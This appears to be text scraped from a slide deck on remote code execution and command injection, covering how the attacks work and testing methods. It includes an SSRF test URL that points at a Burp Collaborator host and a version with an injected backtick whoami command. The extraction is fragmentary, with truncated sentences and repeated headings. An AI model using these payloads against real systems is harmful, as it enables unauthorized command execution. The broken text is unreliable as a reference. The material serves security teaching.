RCE & Command Injection
RCE & Command Injection
Injection
&
RCE
01
Command
Injection
CONTENTS
• How it Works.
• Testing Methodology
• Practical Demonstration
What is Command Injection?
• Command injection is a vulnerability that involves
system (OS).
• Insecure Deserialization
• What is RCE?
• How it Works.
• Testing Methodology
• Practical Demonstration
What is RCE?
http://example.com/import/picture?next_image=http://4v0er435p7gx4lx6432c7bdylprff4.burpcollaborator.net
Testing Methodology
RCE Via Blind SSRF:
• To escalate blind SSRF to RCE:
http://example.com/import/picture?next_image=http://4v0er435p7gx4lx6432c7bdylprff4.burpcollaborator.net ?`whoami`
Testing Methodology
SQL Injection to RCE: